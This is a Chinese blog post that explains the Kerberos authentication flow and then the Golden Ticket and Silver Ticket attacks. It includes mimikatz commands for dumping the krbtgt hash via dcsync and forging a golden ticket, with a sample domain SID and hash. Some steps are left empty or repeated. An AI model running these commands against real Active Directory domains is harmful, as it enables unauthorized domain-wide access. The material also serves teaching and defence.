Kerberos原理 黄金票据、白银票据

已于 2023-10-21 14:57:43 修改
阅读量179 收藏 2
点赞数
文章标签: 数据库
于 2023-10-21 14:56:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43583125/article/details/133961208
版权

KDC包含{AS下发TGT(身份认证),TGS(服务票据)} AD是是实现域的

1、KDC 服务默认会安装在⼀个域的域控中

2、从物理层⾯看,AD与KDC均为域控制器(Domain Controller)

3、AD其实是⼀个类似于本机SAM的⼀个数据库,全称叫account database,存储所 有client的⽩名单,只有存在于⽩名单的client才能顺利申请到TGT

4、KDC 服务框架中包含⼀个 KRBTGT 账⼾,它是在创建域时系统⾃动创建的⼀个账 号,你可以暂时理解为他就是⼀个⽆法登陆的账号,在发放票据时会使⽤到它的密码 HASH 值。

当 Client 想要访问 Server 上的某个服务时,需要先向 AS 证明⾃⼰的⾝份,然后通过 AS 发放的 TGT 向 Server 发起认证请求,这个过程分为三块: Client 与 AS 的交互,Client 与 TGS 的交互,Client 与 Server 的交互

Kerberos原理流程

1、客户端发送自己的用户名给AS
2、AS验证用户名是否在白名单列表,如果在的话随机生成session key(as),返回如下信息
TGT1(session key(as),TGS服务器信息等)--客户端NTLM哈希加密
TGT2(session key(as),客户端信息等)--KRBTGT NTLM哈希加密
3、用自己的NTLM哈希解密TGT1,获得TGS服务器信息以及session key(as),TGT2由于是别人的哈希,所以解不开
生成认证因子(客户端信息,当前时间)--session key(as)加密
发送认证因子以及TGT2给TGS服务
4、TGS服务先解密TGT2获得session key(as),紧接着利用session key(as)解密认
证因子,对比认证因子与TGT2的客户端信息是否一致,如果一致生成session key(TGS),返回如下信息给客户端
TGT3(session key(TGS),服务器信息,票据到期时间)--session key(as)加密
TGT4(session key(TGS),客户端信息,票据到期时间)--客户端想要访问的服务器的哈希加密
5、客户端解密TGT3,得到session key(TGS),服务器信息
生成认证因子2(服务器信息,票据到期时间)--session key(TGS)加密
发送认证因子2以及TGT4给服务器
6、服务器先用自己的哈希解密TGT4得到session key(TGS),客户端信息,票据有效期
利用session key(TGS)解密认证因子对比客户端信息决定是否提供服务

⻩⾦票据 ☁

⻩⾦票据就是伪造的TGT,AS返回的票据

  • 条件 ☁

    1、域名称 2、域的SID值 3、域的KRBTGT账号的HASH 4、伪造任意⽤⼾名

  • 适⽤场景 ☁

    由于有些原因导致你对域管权限丢失,但好在你还有⼀个普通域⽤⼾权限,管理员在域内加固时忘记重置krbtgt密码

  • 利⽤⽅式 ☁

    1、在普通域⽤⼾中使⽤mimikatz⽣成⻩⾦票据.kirbi⽂件并保存

  • privilege:debug
lsadump:lsa /patch

mimikatz log "lsadump:dcsync /domain:xiusafe /user:krbtgt"//
NTLM哈希
kerberos:golden /user:administrator /domain:xiusafe.com /sid:S-1-
5-21-3818247987-2711466351-3365387365
/krbtgt:5eadd5a4f3a4861f8e887310db890002 /ticket:ticket.kirbi

解释

/user:需要伪造的域管理员⽤⼾
/domain:域名称
/sid:SID值,(这⾥要是使⽤系统命令的话抓到是这样的SID,最后⾯的值代表着这
个账号的SID值,注意是去掉最后⼀个-后⾯的值!)
/krbtgt:krbtgt的HASH值
/ticket:⽣成的票据名称

2、清除票据

mimikatz log "lsadump::dcsync /domain:xiusafe /user:krbtgt"//导出NTLM哈希
kerberos::golden /user:administrator /domain:xiusafe.com /sid:S-1-5-21-3818247987-2711466351-3365387365


/krbtgt:5eadd5a4f3a4861f8e887310db890002 /ticket:ticket.kirbi
kerberos::purge \\清除票据
kerberos::tgt \\查看票据

3、导⼊票据

4、创建域管

  • ⽩银票据 ☁

    ⽩银票据就是伪造的ST,TGS返回的票据

  • 条件 ☁

    1.域名 2.域sid 3.⽬标服务器名 4.可利⽤的服务 5.服务账号的NTML HASH 6.需要伪造的⽤⼾名

  • 适⽤场景 ☁

    知道服务器的Hash,可以访问服务器的某些服务⽽不⽤于kdc进⾏交互

  • 利⽤⽅式

    伪造票据 ⽤⼾名可随意填写

    ⾦票和银票的区别 ☁

  • 获取的权限不同 ☁

  • ⾦票:伪造的TGT,可以获取任意Kerberos的访问权限

  • 银票:伪造的ST,只能访问指定的服务,如CIFS

  • 认证流程不同 ☁

  • ⾦票:同KDC交互,但不同AS交互

  • 银票:不同KDC交互,直接访问Server

  • 加密⽅式不同 ☁

  • ⾦票:由krbtgt NTLM Hash 加密

  • 银票:由服务账号 NTLM Hash 加密

ギtaギ。
关注
红队内网攻防渗透:内网渗透之内网对抗:权限维持篇&内网AD&Kerberos点&黄金票据&白银票据&钻石票据&蓝宝石票据
HACKONE的博客
06-25 288
蓝宝石票据与钻石票据类似,票据不是伪造的,而是通过请求后获得的合法票据。在蓝宝石票据中,高权限用户PAC是通过S4U2Self+U2U获得的,然后该PAC会替换原来的PAC,由于该票据是完全合法元素组合起来的,所以是最难检测的票据白银票据是伪造的 Kerberos Ticket Grant Service (TGS) 票证,银票仅允许攻击者伪造特定服务的票证授予服务 (TGS) 票据白银票据所需的利用条件和黄金票据是相同的,只是秘钥换成了对应服务的机器账户 Hash(尾部带$的均为机器账户)
内网渗透--CS伪造黄金票据白银票据
Armandhe的博客
06-24 3639
性感作者,在线翻车
黄金票据&&白银票据
huohaowen的博客
02-20 596
今天来讲讲黄金票据&&白银票据
Kerberos认证
oneslide
09-15 143
Key Distribution Center, or KDCKerberos认证中心,用于分发访问时的凭证。 由三部分组成 用于保存用户身份(principle)和密码(password)的数据库 authentication server (AS) 执行凭据认证(用户名密码确认是否正确)和分发TGT(Ticket Granting Ticket), TGT相当于一个通用令牌,可以使用这个通用令牌兑换各种专用令牌。 Ticket Granting Server (TGS) 基于TGT分发专
Kerberos协议详解
鸥鹭忘机
07-15 956
Kerberos认证过程复杂,使用多个密钥,且密钥种类不断变换,以防止网络拦截。使用临时生成的Session key,只在当前会话中使用,保证安全性。即使密钥被劫持,也只能在当前会话中起作用。
内网安全-Kerberos协议详解
qq_52263650的博客
07-30 469
一种网络认证协议,作为一种可信任的第三方认证服务,使用传统密码技术(如:共享密钥)进行认证服务。人话:解决了远程访问服务器时,如何证明我是我的问题,保证了用户认证的安全性。
Kerberos从入门到精通以及案例实操系列(一)
prefect_start的博客
06-05 6308
整个kerberos认证的过程较为复杂,三次通信中都使用了密钥,且密钥的种类一直在变化,并且为了防止网络拦截密钥,这些密钥都是临时生成的Session Key,即他们只在一次Session会话中起作用,即使密钥被劫持,等到密钥被破解可能这次会话都早已结束,这为整个kerberos认证过程保证了较高的安全性。kerberos认证的整体流图kerberos认证的时序图本地登录(无需认证)远程登录(需进行主体认证,认证操作见下文)退出输入:exit2. 创建Kerberos主体。
Kerberos黄金票据详解
weixin_30642267的博客
12-27 1124
0x01黄金票据原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到控制器以获得服务票据Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
kerberos 票据_渗透之黄金票据的实际利用
weixin_39861905的博客
12-25 499
先介绍下Kerberos协议:Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。在Kerberos协议中主要是有三个角色的存在:1:访问服务的Client(用户的机器客户端)2:提供服务的Server(服务端)3:KDC(Key Distribution Center)密钥分发中心其中KDC服务默认会安装在一...
kerberos黄金票据白银票据
最新发布
m0_73826804的博客
02-20 1288
白银票据:实际就是在抓取到了控服务hash的情况下,在client端以一个普通用户的身份生成TGS票据,并且是针对于某个机器上的某个服务的,生成的白银票据,只能访问指定的target机器中指定的服务。/sid:SID值,(这里要是使用系统命令的话抓到是这样的SID,最后面的值代表着这个账号的SID值,注意是去掉最后一个-后面的值!黄金票据:是直接抓取控中ktbtgt账号的hash,来在client端生成一个TGT票据,那么该票据是针对所有机器的所有服务。白银票据就是伪造的ST,TGS返回的票据
Kerberos协议分析及服务器配置以及黄金白银票据攻击复现
nopants的博客
06-16 1041
服务器搭建以及用户加入服务器及黄金白银票据攻击的验证复现
Kerberos协议和黄金白银票据以及委派攻击
Geneva_ovo的博客
10-09 113
Kerberos 是一种基于加密 Ticket 的身份认证协议。Kerberos 主要由三个部分组成:Key Distribution Center (即KDC)、Client 和 Service。
全网最详细 | Kerberos协议详解
Ms08067安全实验室
02-27 7170
目录Kerberos基础PAC特权属性证书1. PAC结构2. PAC凭证信息3. PAC签名4. KDC验证PAC5. PAC在kerberos中的优缺点Kerberos实验AS-REQ & AS-REP1. AS-REQ请求包分析2. AS-REP回复包分析 (1) TGT认购权证 (2) Lo...
内网安全——Kerberos协议详细全解
m0_67189356的博客
09-21 6127
Kerberos认证详解
AD KDC error,Event ID 26/27
weixin_34146986的博客
01-03 198
Description: While processing an AS request for target service krbtgt, the account **** did not have a suitable key for generating a Kerberos ticket (the missing key has an ID of 2). The ...
黄金票据白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 5551
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
kerberos 术语和认证流程介绍
yang灬仔
02-02 1113
重要术语 1. KDC 全称:key distributed center 作用:整个安全认证过程的票据生成管理服务,其中包含两个服务,AS和TGS 2. AS 全称:authentication service 作用:为client生成TGT的服务 3.TGS 全称:ticket granting service 作用:为client生成某个服务的ticket 4. AD 全称:account database 作用:存储所有client的白名单,只有存在于白名单的client..
windows 认证 Kerberos详解
热门推荐
Sp4rkW的博客
02-19 1万+
windows 在工作中经常遇到,一直没有好好总结过,乘着最近有时间,将自己所理解的与大家分享一下 0x01、 Kerberos认证简介 windows 对于身份验证有多种方式,比如现在笔记本很常见的指纹解锁开机。在中,依旧使用 Kerberos 作为认证手段。 Kerberos 这个名字来源于希腊神话,是冥界守护神兽的名字。 Kerberos 是一个三头怪兽,之所以用它来命名一种完全认证...
Kerberos认证(一)——简明详细的安装和说明
笑里笑外~
12-21 3727
Kerberos认证(一)——超详细的安装和说明 文章目录Kerberos认证(一)——超详细的安装和说明准备一、安装Kerberos server安装指令修改krb5.conf配置kdc.conf配置kadm5.acl创建数据库启动服务创建管理员二、安装Kerberos client安装修改配置测试kadmin三、常见操作指令Kerberos常用命令kadmin模式下常用命令总结 准备 两台Centos7机器: 机器 服务 192.168.44.132 Kerberos server(
kerberos 创建票据
03-29
2. Kerberos服务器向用户发送一个“票据请求”,该请求包括一个随机生成的票据授权票(TGT)。 3. 用户使用其密码对TGT进行加密,并将其发送回Kerberos服务器。 4. Kerberos服务器对用户进行身份验证,并为用户颁发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值